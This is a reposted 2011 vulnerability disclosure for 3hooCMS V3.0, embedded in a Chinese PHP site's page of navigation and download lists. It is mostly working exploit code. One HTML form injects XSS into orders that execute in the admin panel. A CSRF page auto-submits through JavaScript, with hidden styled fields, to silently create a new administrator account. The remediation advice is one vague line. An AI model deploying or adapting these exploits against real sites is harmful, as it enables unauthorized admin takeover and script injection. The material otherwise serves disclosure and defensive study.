Php文档 Php问答行业资讯 Php论坛 Php手册 Php博客

游戏榜单

软件榜单

关闭导航

热搜榜

热门下载

热门标签

php爱好者> php文档>3hooCMS V3.0 XSS+CSRF&EXP

3hooCMS V3.0 XSS+CSRF&EXP

时间：2011-01-17 来源：B0mbErM@n

发布日期：2011-01.17
发布作者：B0mbErM@n

影响版本：3hooCMS V3.0
官方网站：http://www.3hoo.net/

漏洞类型：跨站XSS
漏洞描述：XSS:未对提交内容进行过滤,后台查看订单时将执行XSS语句
CSRF:未对URL来源进行验证,当管理存在cookie时可执行设定的语句

###################### XSS ######################

<style>
.s1{font-size:0px; color:#FFFFFF; border:0px}
</style>
<form method="POST" action="http://localhost/SendOrder.Asp">
<input type='text' name='Title' size='32' value='在这插XSS语句'>
<input type='text' name='Quantity' size='16' value='1' class="s1">
<option value="个"> </option>
<input type="submit" value="提交" name="B1" >
</form>

###################### CSRF #####################(添加管理员)

<style>
.s1{font-size:0px; color:#FFFFFF; border:0px}
</style>
<form method="POST" action="http://localhost/manage/Admin_Send.Asp?rsend=SendAdmin" name="FrmMain">
<input type="text" name="Username" size="20" value="帐号" class="s1">
<input type="text" name="Password" size="20" value="密码" class="s1">
<input type="submit" name="B1" value="B0mbErM@n" class="s1"> </form>
<script>
document.FrmMain.submit();
</script>

修复方案：加强验证与过滤

标签分类：跨站XSS

相关阅读更多 +

什么是海量数据海量数据的特征海量数据的产生和应用海量数据和大数据的关系 php教程 2025-06-01
什么是海量数据海量数据的特征海量数据的产生和应用海量数据和大数据的关系 php教程 2025-06-01
Endpoint是什么意思 Endpoint和API的区别 php教程 2025-06-01
Endpoint是什么意思 Endpoint和API的区别 php教程 2025-06-01
什么是数据编织(Data fabric)?数据编织详细介绍 php教程 2025-06-01

排行榜更多 +

谷歌卫星地图免费版下载

谷歌卫星地图免费版下载

生活实用下载

谷歌卫星地图免费版下载

谷歌卫星地图免费版下载

生活实用下载

kingsofpool官方正版下载

kingsofpool官方正版下载

赛车竞速下载

4
毒药轮盘手机版下载
162.05M · 96℃

1970-01-01

下载
5
剑侠情缘零b服手游下载
2016 MB · 92℃

1970-01-01

下载
6
惊魂动物园游戏手机版下载
167.98MB · 97℃

1970-01-01

下载